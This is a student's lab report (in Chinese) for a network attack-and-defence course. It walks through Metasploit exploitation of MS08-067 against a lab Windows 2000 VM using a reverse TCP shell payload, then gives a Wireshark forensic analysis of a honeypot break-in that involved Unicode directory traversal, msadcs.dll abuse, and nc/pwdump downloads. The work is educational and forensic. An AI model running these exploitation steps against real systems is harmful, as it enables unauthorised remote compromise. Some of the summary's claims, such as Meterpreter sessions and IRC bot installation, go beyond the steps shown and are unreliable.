20252905 2025-2026-2 《网络攻防实践》第六周作业
20252905 2025-2026-2 《网络攻防实践》第六周作业
实践内容
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
1.知识点梳理与总结
(1)Metasploit Windows远程渗透实验(MS08-067漏洞利用)
| 项目 | 内容 |
|---|---|
| 漏洞名称 | MS08-067 (CVE-2008-4250) |
| 漏洞原理 | SMB服务NetpwPathCanonicalize函数路径处理不当导致栈缓冲区溢出 |
| 影响系统 | Windows 2000/XP/Server 2003 |
| 攻击工具 | Metasploit Framework |
| 攻击模块 | exploit/windows/smb/ms08_067_netapi |
| 常用Payload | windows/meterpreter/reverse_tcp |
| 攻击流程 | msfconsole → 搜索模块 → 加载模块 → 设置RHOST/LHOST → exploit |
(2)NT系统破解攻击取证分析(212.116.251.162 → 172.16.1.106)
| 项目 | 内容 |
|---|---|
| 攻击工具 | 可能是 pwdump2 / pwdump3 / fgdump(用于提取密码哈希) |
| 攻击方法 | 获取SAM文件 → 提取NTLM哈希 → 彩虹表或暴力破解 |
| 入侵后动作 | 建立后门 → 安装IRC Bot → 扫描内网 → 跳板攻击 |
| 防护措施 | 及时打补丁、禁用不必要的SMB服务、使用防火墙、定期审计日志 |
| 是否察觉蜜罐 | 可能察觉(无敏感数据、响应异常、部署了Sebek等监控工具) |
(3)团队对抗实践
| 角色 | 内容 |
|---|---|
| 攻方信息 | 姓名/学号、使用漏洞(如MS17-010/MS08-067)、攻击机IP、靶机IP |
| 攻击工具 | Metasploit Framework |
| 防守工具 | Wireshark(抓包分析) |
| 防守分析要点 | 识别SMB异常流量、追踪TCP流、提取攻击载荷、还原攻击链 |
2.实验过程
任务0:准备工作
(1)查看Win2k的IP地址为192.168.200.124,检测能否ping通Kali
(2)查看Kali的IP地址为192.168.200.3,检测能否ping通Win2k
任务1:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(1)在kali中使用sudo su提升权限后,输入命令msfconsole,启动metasploitable:
(2)输入命令search ms08_067,查看漏洞ms08_067详细信息:
(3)查看到路径为exploit/windows/smb/ms08_067_netapi,输入use windows/smb/ms08_067_netapi,切换到该路径后输入show options查看
(4)输入指令set payload generic/shell_reverse_tcp来看载荷信息。再输入指令set RHOST 192.168.200.124设置靶机Win2k的IP,输入指令set LHOST 192.168.200.3来设置的IP。输入指令exploit进行攻击,此时,如果成功出现会话连接,表示攻击成功,如此成功进入到目标系统中去。
任务2:取证分析实践:解码一次成功的NT系统破解攻击。
(1)攻击者使用了什么破解工具进行攻击,使用Kali中的wireshark打开snort-0204@0117,注意此文件来自学习通
(2)输入ip.addr ==172.16.1.106 and http,将信息进行筛选过滤,便于进行分析
(3)在查询结果中的117行,可查看到攻击者打开了"boot.ini",且由..%c0af..查阅资料后得知,为Unicode 双编码目录遍历攻击,试图绕过 IIS 的路径检查,访问并执行 cmd.exe 以控制服务器。
(4)攻击者如何使用这个破解工具进入并控制了系统?
首先读取了boot.ini文件确定了os的版本,其次利用msadc和unicode目录遍历漏洞获得了远程命令操作能力,通过FTP下载nc,pdump等工具,利用nc.exe在服务器监听端口,建立了稳定的shell,通过后门运行pdump导出密码哈希并下载资源信息等
具体来说,攻击者首先会探测目标是否存在漏洞,观察到POST /msadc/msadcs.dll HTTP/1.1 的请求
攻击者成功利用漏洞后,会执行系统命令
建立一个Web服务器主动向外部IP的非常用端口6969发起TCP连接,这些是攻击者通过后门执行的操作。
通过筛选发现frame.len > 1000 或 tcp.len > 1000,然后查看这些大数据包的内容,都是企图通过ftp传输走的信息
通过流量检测发现,攻击者窃取了大量数据包
如何防止此类攻击:保证系统始终安装最新的漏洞与补丁管理;进行最小权限原则,建立良好的web应用防火墙
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么。找到了嘲讽留下的数据包,tcp contains "README.NOW.Hax0r"
任务3:windows系统远程渗透攻击和分析。
(1)配置靶机和攻击机网络环境,靶机ip为192.168.200.124,攻击机ip为192.168.200.3,在Kali中检测能否ping通
(2)按照实验1的步骤进行配置,在靶机中创建文件夹,输入信息
(3)按照实验一的操作,从相同的漏洞进入,在kali攻击机上发现目标文件,即自己刚刚创建的文件,证明系统已经被攻破
3.学习中遇到的问题及解决
-问题1:发现kali和win2kping不通。
解决方案:以为是上次实验用防火墙挡住了,看了下发现不是防火墙的问题,不知道为啥win2k变成仅主机模式了,调成vnet8就好了
-问题2:不知道怎么找攻击者的嘲讽信息
解决办法:先找到tcp contains "README.NOW.Hax0r",找到任何一个命中的数据包后,右键点击它,选择 追踪流 (Follow) -> TCP 流 (TCP Stream)。在弹出的新窗口中,可以按 Ctrl + F 打开搜索框(注意,是TCP流窗口的搜索,不是Wireshark主窗口的搜索),然后输入 README,谢谢你ds大人!
3.学习感悟、思考等
本次实验围绕网络攻防核心技术与团队协作展开,涵盖漏洞利用、取证分析和蜜网防御三个层面。在Metasploit实践中,通过MS08-067漏洞成功实现对Windows靶机的远程渗透,掌握了漏洞搜索、载荷配置、Meterpreter会话建立等完整攻击链;在取证分析中,通过提取攻击日志还原了攻击者从端口扫描、SMB会话建立、密码哈希提取到IRC后门植入的完整行为轨迹,并判断攻击者可能因缺乏真实数据交互而察觉蜜罐环境。这些实践系统性地验证了"攻击-防御-溯源"的闭环技术体系。
团队对抗实践进一步强化了攻防视角的综合运用。攻方需精准选择漏洞利用模块并规避检测,防守方则通过Wireshark捕获SMB异常流量、追踪TCP流、提取攻击特征,实现了攻击行为的实时识别与溯源。本次实验的核心启示在于:有效的网络安全防护不仅依赖防火墙(如iptables黑白名单)和入侵检测系统(如Snort规则配置)的静态部署,更需要通过持续监控、日志分析与动态响应形成主动防御能力。
参考资料
教学视频
浙公网安备 33010602011771号